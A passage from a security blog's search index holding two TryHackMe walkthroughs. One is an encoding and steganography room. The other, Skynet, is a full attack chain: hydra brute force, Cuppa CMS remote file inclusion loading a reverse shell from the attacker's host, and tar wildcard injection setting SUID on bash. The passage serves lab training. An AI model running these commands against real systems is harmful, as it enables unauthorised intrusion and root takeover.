transformations in a chain.\nChallenge 1: Leetspeak c4n y0u c4p7u23 7h3 f149?\nLeetspeak (l33tspeak) is a substitution of letters with visually similar numbers or symbols. Common in hacker culture since the 80s.\nLeetspeak Letter 4 a 0 o 7 t 2 r 3 e 1 i 9 g Answer: can you capture the flag?\nChallenge 2: Binary 01101100 01100101 01110100 01110011 00100000 01110100 01110010 01111001 00100000 01110011 01101111 01101101 01100101 00100000 01100010 01101001 01101110 01100001 01110010 01111001 00100000 01101111 01110101 01110100 00100001 Each group of 8 bits represents an ASCII character. In CyberChef: From Binary.\nAnswer: lets try some binary out!\nChallenge 3: Base32 MJQXGZJTGIQGS4ZAON2XAZLSEBRW63LNN5XCA2LOEBBVIRRHOM====== Base32 uses the A-Z and 2-7 alphabet, with = as padding. In CyberChef: From Base32.\nAnswer: base32 is super common in CTF's\nChallenge 4: Base64 RWFjaCBCYXNlNjQgZGlnaXQgcmVwcmVzZW50cyBleGFjdGx5IDYgYml0cyBvZiBkYXRhLg== Base64 uses A-Z, a-z, 0-9, +, / and = as padding. Recognizable by the == at the end. In CyberChef: From Base64.\nAnswer: Each Base64 digit represents exactly 6 bits of data.\nChallenge 5: Hexadecimal 68 65 78 61 64 65 63 69 6d 61 6c 20 6f 72 20 62 61 73 65 31 36 3f Each hex pair represents one byte. 20 is the space character in ASCII. In CyberChef: From Hex.\nAnswer: hexadecimal or base16?\nChallenge 6: ROT13 Ebgngr zr 13 cynprf! ROT13 shifts each letter 13 positions in the alphabet. Applied twice it returns to the original (it is its own inverse). In CyberChef: ROT13.\nAnswer: Rotate me 13 places!\nChallenge 7: ROT47 *@F DA:? \u0026gt;6 C:89E C@F?5 323J C:89E C@F?5 Wcf E:\u0026gt;6DX ROT47 is like ROT13 but applies to 94 printable ASCII characters (from 33 to 126), not just letters. That\u0026rsquo;s why it can encrypt symbols, numbers and letters. In CyberChef: ROT47.\nAnswer: You spin me right round baby right round (47 times)\nChallenge 8: Morse Code . .-.. . -.-. --- -- -- ..- -. .. -.-. .- - .. --- -. . -. -.-. --- -.. .. -. --. Morse code uses dots and dashes to represent letters. In CyberChef: From Morse Code.\nAnswer: TELECOMMUNICATION ENCODING\nChallenge 9: BCD (Binary Coded Decimal) 85 110 112 97 99 107 32 116 104 105 115 32 66 67 68 BCD represents each decimal digit with its bit equivalent. These values are directly decimal ASCII codes. In CyberChef: From Charcode (decimal base).\nAnswer: Unpack this BCD\nChallenge 10: Multi-layer string LS0tLS0gLi0tLS0g... This string requires decoding in multiple layers:\nBase64 → produces Morse code Morse → produces plain text In CyberChef: From Base64 → From Morse Code.\nAnswer: Let's make this a bit trickier...\nSection 2: Spectrograms A spectrogram is a visual representation of the frequencies of an audio signal over time. Messages can be hidden in audio by setting the volume of specific frequencies to form letters or images when viewed in a spectrogram.\nProcess Download the audio file from the room Open it in Audacity In the audio track, click on the track name → select \u0026ldquo;Spectrogram\u0026rdquo; The spectrogram will reveal text visible in the frequencies Answer: Super Secret Message\nSection 3: Steganography Steganography hides information inside other files — images, audio, video — in a way that is not visible to the naked eye. Unlike cryptography (which encrypts the message), steganography hides the existence of the message.\nProcess Download the image from the room Use steghide to extract hidden data: steghide extract -sf image.jpg If it has a passphrase, try with an empty string (press Enter without typing anything) The extracted file contains the answer Answer: SpaghettiSteg\nSection 4: Security through obscurity This section shows how attackers (and defenders) can hide files inside other files — a technique used in both malware and CTFs.\nChallenge 1: File inside a file Download the file from the room Use binwalk to see what\u0026rsquo;s inside: binwalk file Extract the content: binwalk -e file Inside you will find the hidden file First hidden file: hackerchat.png\nChallenge 2: Hidden text inside the file With the extracted file, inspect it: strings hackerchat.png Or open it with a hex editor and look for plain text at the end of the file.\nHidden text: AHH_YOU_FOUND_ME!\nQuick Encoding Reference This table summarizes the most common encodings in CTFs:\nEncoding Visual characteristic Tool Binary Only 0s and 1s in groups of 8 CyberChef: From Binary Hexadecimal Characters 0-9 and a-f in pairs CyberChef: From Hex Base32 Uppercase + 2-7, padding with = CyberChef: From Base32 Base64 A-Z, a-z, 0-9, +/, padding == CyberChef: From Base64 ROT13 Readable text but shifted CyberChef: ROT13 ROT47 Symbols mixed with text CyberChef: ROT47 Morse Dots, dashes and spaces CyberChef: From Morse Leetspeak Numbers mixed with letters Manual inspection Lessons Learned CyberChef is indispensable for CTFs — Most of the encodings in this room are solved in seconds with CyberChef. Learning to chain operations in CyberChef is a fundamental skill for any CTF player. Recognizing encodings at a glance saves time — == at the end → Base64. Uppercase with 2-7 → Base32. Dots and dashes → Morse. 0s and 1s in groups of 8 → Binary. Building this visual recognition is essential. Steganography isn\u0026rsquo;t just images — Information can be hidden in audio (spectrograms), video, PDF documents, ZIP files, and more. Whenever you have a file in a CTF, ask yourself: is there something hidden here? binwalk and strings are your first commands with unknown files — strings shows readable text inside any binary file. binwalk detects embedded files. Use them before opening any suspicious file. Security through obscurity is not real security — Hiding files inside others or changing extensions does not protect data. An attacker with binwalk or strings finds it in seconds. Real security requires encryption, not concealment. For the eJPT Although the eJPT focuses more on network and system exploitation, the concepts from this room are relevant for:\nRecognizing encoded data in web application responses (Base64 in cookies, JWT tokens, etc.) Basic forensic analysis in post-exploitation Understanding how information is hidden in files Approximate completion time: 30-45 minutes with CyberChef open and the encoding reference at hand.\nReferences c4ptur3-th3-fl4g — TryHackMe CyberChef — GCHQ Audacity steghide documentation binwalk documentation GTFOBins ","permalink":"https://r3df0x1-c.github.io/f0x1-blog/en/walkthroughs/road-to-ejpt/c4ptur3-th3-fl4g/","summary":"\u003ch2 id=\"summary\"\u003eSummary\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003ec4ptur3-th3-fl4g\u003c/strong\u003e is the seventh machine of the \u003cem\u003eRoad to eJPTv2\u003c/em\u003e series and the most different one so far. No service exploitation, no reverse shells, no privesc. It\u0026rsquo;s a pure \u003cstrong\u003eencoding, cryptography and steganography\u003c/strong\u003e challenge — designed to get you comfortable with data representation systems that appear constantly in CTFs and forensic analysis.\u003c/p\u003e\n\u003cp\u003eThis room covers: leetspeak, binary, Base32, Base64, hexadecimal, ROT13, ROT47, Morse code, BCD, Brainfuck/Malbolge, audio spectrograms and image steganography.\u003c/p\u003e","title":"c4ptur3-th3-fl4g"},{"content":"Summary Skynet is the eighth machine of the Road to eJPTv2 series and one of the most complete in the path. It combines SMB enumeration, brute force against a webmail, exploitation of a CMS with Remote File Inclusion, and a classic privilege escalation based on tar wildcard injection in a cron job.\nA chained attack flow where each phase depends on the previous one — exactly the kind of reasoning the eJPT evaluates.\nAttribute Value Platform TryHackMe Difficulty Medium OS Linux (Ubuntu) Room Skynet Skills SMB Enum, Brute Force, RFI, Tar Wildcard PrivEsc 🎥 Video Walkthrough If you prefer to follow the walkthrough step by step, keep reading. The video covers the same process in visual format.\nTools Used nmap — port scanning and version detection smbmap / smbclient — SMB share enumeration gobuster — web directory fuzzing hydra — HTTP form brute force searchsploit — local exploit search netcat — reverse shell listener python3 — shell stabilization Solution Overview Recon: nmap reveals SMB, HTTP and mail services. Anonymous SMB exposes a password wordlist. Web enumeration: gobuster finds /squirrelmail. Brute force: Hydra uses the SMB wordlist to compromise milesdyson\u0026rsquo;s webmail. Email pivot: The inbox contains milesdyson\u0026rsquo;s SMB password. Authenticated SMB: The personal share reveals a hidden web directory. Cuppa CMS: A second gobuster run finds an admin panel with a known RFI vulnerability. Reverse shell: RFI executes a PHP payload hosted on our machine. User flag: Access as www-data allows reading /home/milesdyson/user.txt. PrivEsc: backup.sh runs tar * as root via cron — we exploit the wildcard to set SUID on /bin/bash. Reconnaissance Ping We verify connectivity and identify the OS by TTL:\nping -c 1 10.66.170.216 64 bytes from 10.66.170.216: icmp_seq=1 ttl=62 time=64.1 ms TTL 62 → Linux (original value is 64, decremented through network hops).\nNmap — Port Scan nmap 10.66.170.216 -n -Pn -sS -p- --open --min-rate=5000 -oG allTCPports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 110/tcp open pop3 139/tcp open netbios-ssn 143/tcp open imap 445/tcp open microsoft-ds Interesting attack surface: HTTP, SMB (139/445) and mail services (110/143).\nNmap — Versions and Scripts nmap 10.66.170.216 -n -Pn -sS -p22,80,110,139,143,445 -sCV --min-rate=5000 -oN skynetscann.txt Key findings:\nApache 2.4.18 on port 80 OpenSSH 7.2p2 on port 22 Samba 4.3.11 on ports 139/445 — workgroup: WORKGROUP Mail: Dovecot pop3d / imapd SMB — smbmap We enumerate shared resources without credentials:\nsmbmap -H 10.66.170.216 Disk Permissions Comment ---- ----------- ------- print$ NO ACCESS Printer Drivers anonymous READ ONLY Skynet Anonymous Share milesdyson NO ACCESS Miles Dyson Personal Share IPC$ NO ACCESS IPC Service Two important findings: the anonymous share is accessible without credentials, and a user named milesdyson exists.\nSMB — smbclient (anonymous) smbclient //10.66.170.216/anonymous -N smb: \\\u0026gt; dir attention.txt logs/ We download the contents of the logs directory:\nsmb: \\\u0026gt; cd logs smb: \\logs\\\u0026gt; dir log1.txt log2.txt log3.txt log1.txt contains a list of potential passwords — our wordlist for the brute force.\nWeb Fuzzing — gobuster gobuster dir -u http://10.66.170.216 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,css,xml,bak /admin (Status: 301) /squirrelmail (Status: 301) We find /squirrelmail — a webmail application. The combination of a known username (milesdyson) + the SMB wordlist is perfect for a brute force attack.\nExploitation Brute Force — Hydra against SquirrelMail SquirrelMail uses a POST form. We configure Hydra with the correct parameters:\nhydra -l milesdyson -P log1.txt 10.66.170.216 http-post-form \\ \u0026#34;/squirrelmail/src/redirect.php:login_username=^USER^\u0026amp;secretkey=^PASS^\u0026amp;js_autodetect_results=1\u0026amp;just_logged_in=1:F=Unknown user or password incorrect.\u0026#34; [80][http-post-form] host: 10.66.170.216 login: milesdyson password: cyborg007haloterminator Credentials obtained: milesdyson:cyborg007haloterminator\nSquirrelMail — Reading the Inbox We access the webmail at http://10.66.170.216/squirrelmail/src/login.php:\nThe inbox contains 3 emails. The most relevant is from skynet@skynet with subject \u0026ldquo;Samba Password reset\u0026rdquo;:\nWe have changed your smb password after system malfunction. Password: )s{A\u0026amp;2Z=F^n_E.B` New SMB password: `)s{A\u0026amp;2Z=F^n_E.B``\nSMB — Authenticated Access as milesdyson smbclient //10.66.170.216/milesdyson -U milesdyson Password: )s{A\u0026amp;2Z=F^n_E.B` smb: \\\u0026gt; dir Improving Deep Neural Networks.pdf Natural Language Processing-Building Sequence Models.pdf Convolutional Neural Networks-CNN.pdf notes/ Neural Networks and Deep Learning.pdf Structuring your Machine Learning Project.pdf We navigate to notes/ and download important.txt:\nsmb: \\notes\\\u0026gt; get important.txt 1. Add features to beta CMS /45kra24zxs28v3yd 2. Work on T-800 Model 101 blueprints 3. Spend more time with my wife Hidden directory revealed: /45kra24zxs28v3yd\nSecond Fuzzing Run — Cuppa CMS We fuzz the hidden directory:\ngobuster dir -u http://10.66.170.216/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,css,xml,bak /administrator (Status: 301) At http://10.66.170.216/45kra24zxs28v3yd/administrator/ we find a Cuppa CMS admin panel.\nSearchsploit — Cuppa CMS RFI Vulnerability searchsploit cuppa cms Cuppa CMS - \u0026#39;/alertConfigField.php\u0026#39; Local/Remote File Inclusion | php/webapps/25971.txt searchsploit -m 25971 The exploit describes a Remote File Inclusion (RFI) vulnerability in the urlConfig parameter of alertConfigField.php. It allows loading a remote PHP file and executing it on the server.\nReverse Shell via RFI We prepare a PHP reverse shell payload (e.g., PentestMonkey\u0026rsquo;s) and host it on our machine with Python:\npython3 -m http.server 80 We set up a netcat listener:\nnc -lvnp 4444 We trigger the RFI pointing to our server:\nhttp://10.66.170.216/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://\u0026lt;YOUR_IP\u0026gt;/rev.php We receive the connection as www-data.\nPost-Exploitation Shell Stabilization python3 -c \u0026#39;import pty; pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; # Ctrl+Z stty raw -echo; fg reset xterm export TERM=xterm export SHELL=bash stty rows 48 cols 184 User Flag www-data@skynet:/home/milesdyson$ cat user.txt 7ce5c2109a40f958099283600a9ae807 Privilege Escalation Enumeration — backup.sh Exploring milesdyson\u0026rsquo;s home directory we find the backups folder:\nwww-data@skynet:/home/milesdyson/backups$ cat backup.sh #!/bin/bash cd /var/www/html tar cf /home/milesdyson/backups/backup.tgz * This script runs tar with a wildcard (*) in /var/www/html. The backup.tgz file updates periodically, indicating it runs as a root cron job.\nExploitation — Tar Wildcard tar accepts arguments starting with -- if it finds them as filenames in the directory. This lets us inject arbitrary options into tar by creating files with special names.\nStep 1: Create a script that sets SUID on /bin/bash:\necho -e \u0026#39;#!/bin/bash\\nchmod +s /bin/bash\u0026#39; \u0026gt; /var/www/html/root_shell.sh Step 2: Create the \u0026ldquo;trap\u0026rdquo; files that will be interpreted as tar flags:\ntouch /var/www/html/--checkpoint=1 touch /var/www/html/\u0026#34;--checkpoint-action=exec=sh root_shell.sh\u0026#34; When cron runs tar cf backup.tgz *, the wildcard expands and includes these files as arguments:\ntar cf backup.tgz --checkpoint=1 --checkpoint-action=exec=sh root_shell.sh ... Step 3: Wait for cron to run and verify:\nwww-data@skynet:/home/milesdyson/backups$ ls -l /bin/bash -rwsr-sr-x 1 root root 1037528 Jul 12 2019 /bin/bash The SUID bit is active. We escalate to root:\n/bin/bash -p bash-4.3# whoami root Root Flag bash-4.3# cat /root/root.txt Lessons Learned Anonymous SMB can be a gold mine — A publicly readable share containing a password wordlist was the entry point for compromising everything else. Always enumerate SMB exhaustively. Pivoting between services is key — Webmail credentials → SMB password → hidden directory → CMS. Each service feeds the next. In a real pentest, this kind of chaining is very common. Internal files reveal hidden attack surface — The important.txt from SMB revealed a directory that would never have appeared in a standard external fuzzing run. RFI requires network access between servers — To exploit Cuppa CMS\u0026rsquo;s RFI, the victim server needs to reach our IP. Always verify connectivity before firing the exploit. Tar wildcard is a classic privesc — Any script that runs tar *, zip *, rsync *, etc. as root in a writable directory is vulnerable. Look for cron jobs with wildcards during post-exploitation. For the eJPT This machine directly covers several exam objectives:\nConcept eJPT Relevance SMB Enumeration Core technique in mixed Windows/Linux networks HTTP Brute Force Common scenario in web applications Remote File Inclusion Classic web vulnerability in the syllabus Cron + Wildcard PrivEsc Realistic privesc without kernel exploits Approximate completion time: 60-90 minutes.\nReferences Skynet — TryHackMe Cuppa CMS RFI — Exploit-DB 25971 Tar Wildcard Injection — GTFOBins PentestMonkey PHP Reverse Shell smbmap ","permalink":"https://r3df0x1-c.github.io/f0x1-blog/en/walkthroughs/road-to-ejpt/skynet/","summary":"\u003ch2 id=\"summary\"\u003eSummary\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSkynet\u003c/strong\u003e is the eighth machine of the \u003cem\u003eRoad to eJPTv2\u003c/em\u003e series and one of the most complete in the path. It combines SMB enumeration, brute force against a webmail, exploitation of a CMS with Remote File Inclusion, and a classic privilege escalation based on \u003ccode\u003etar\u003c/code\u003e wildcard injection in a cron job.\u003c/p\u003e\n\u003cp\u003eA chained attack flow where each phase depends on the previous one — exactly the kind of reasoning the eJPT evaluates.\u003c/p\u003e","title":"Skynet"}]